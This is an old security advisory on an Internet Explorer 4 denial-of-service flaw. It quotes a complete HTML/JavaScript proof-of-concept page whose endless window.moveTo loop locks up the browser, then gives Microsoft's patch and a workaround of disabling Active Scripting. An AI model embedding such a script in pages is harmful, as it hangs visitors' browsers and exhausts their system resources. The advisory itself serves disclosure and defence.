COMMAND

    MS Internet Explorer

SYSTEMS AFFECTED

    Systems running IE (Win95, NT)

PROBLEM

    Dan Anatol posted following.  The code below will make any browser
    "go nuts", however, if you press escape on netscape 4 (STOP) -  it
    stops - IE 4,  however... does not.   CPU goes up, mem  usage goes
    up -  etc.   This was  tested with  win95, NT+SP3 4.0 workstation,
    and NT 4.0+SP3  Server.  Minimizing  won't work either,  on NT the
    window unminimizes  itself, on  95 the  minimized task-bar "jumps"
    around.

    One more interesting thing: Explorer lets you position the  window
    out  of  the  screen's  range  (in  a  position thats "out" of the
    screen) -  netscape doesnt.   (you can  also change  the minx/miny
    numbers to a negative values - and it "works" with IE.)  "Exploit"
    code follows:

    <HTML>
    <!-- Written by: xyster

         email: xyster@writeme.com

         Have fun . . .

     -->
    <HEAD>
    <TITLE>Bounce</TITLE>
    <SCRIPT LANGUAGE="javascript">
    var dx, dy, x, y, minx, miny, maxx, maxy;
    dx = 50;
    dy = 100;
    x = Math.random() * 200;
    y = Math.random() * 200;
    minx = 0;
    maxx = 600;
    miny = 0;
    maxy = 600;
    do {
        window.moveTo(x, y);
        x += dx;
        y += dy;
        if (x <= minx  ||  x >= maxx) dx = -dx;
        if (y <= miny  ||  y >= maxy) dy = -dy;
       } while(1);
    </SCRIPT>
    </HEAD>
    <BODY>
    </BODY>
    </HTML>

SOLUTION

    On August 17th Microsoft released  a patch that fixes the  problem
    as  reported.  This  patch  is  available  for  download  from the
    Microsoft Scripting Technologies web site:

        http://www.microsoft.com/msdownload/vbscript/scripting.asp

    Microsoft  has  also  made  this  patch  available  as a "Critical
    Update"  for  Windows  98  customers  through  the Windows Update.
    Localized versions of the  patch are available from  the Microsoft
    Scripting Technologies web site:

        http://www.microsoft.com/msdownload/vbscript/scripting.asp

    MS strongly encourage customers to apply the patch. However, users
    who cannot apply the patch  can use the Zones security  feature in
    Internet Explorer  to provide  additional protection  against this
    issue  by  disabling  Active  Scripting  in  the  "Internet"   and
    "Restricted Sites"  Zones. This  would still  allow JScript  to be
    run from trusted Internet sites, and on the user's local intranet.
    To turn off Active Scripting for the "Internet" Zone:

        1. From Internet Explorer, choose "Internet Options" from  the
           "View" menu.
        2. Click on the tab labeled "Security".
        3. Click on "Internet Zone", then click "Customize Settings".
        4. Scroll  to the  bottom of  the list  and click on "Disable"
           under the "Active Scripting" setting.

    These same procedures can  be followed for the  "Restricted Sites"
    Zone.